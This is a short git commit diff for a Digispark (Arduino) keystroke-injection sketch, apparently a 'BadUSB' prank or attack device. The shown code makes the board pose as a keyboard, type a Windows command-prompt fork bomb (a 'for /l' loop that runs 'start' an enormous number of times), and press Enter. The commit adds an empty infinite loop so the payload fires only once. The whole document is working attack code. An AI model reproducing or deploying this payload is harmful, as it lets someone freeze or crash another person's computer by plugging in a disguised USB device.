Made the Fork_Bomb Execute just once
This commit is contained in:
parent
a014cf94fc
commit
860effed1d
|
@ -21,4 +21,7 @@ void loop() {
|
|||
DigiKeyboard.delay(500);
|
||||
DigiKeyboard.print(F("for /l %x in (1,1,10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000) do start"));
|
||||
DigiKeyboard.sendKeyStroke(KEY_ENTER);
|
||||
for (;;) {
|
||||
/*Stops the digispark from running the scipt again*/
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue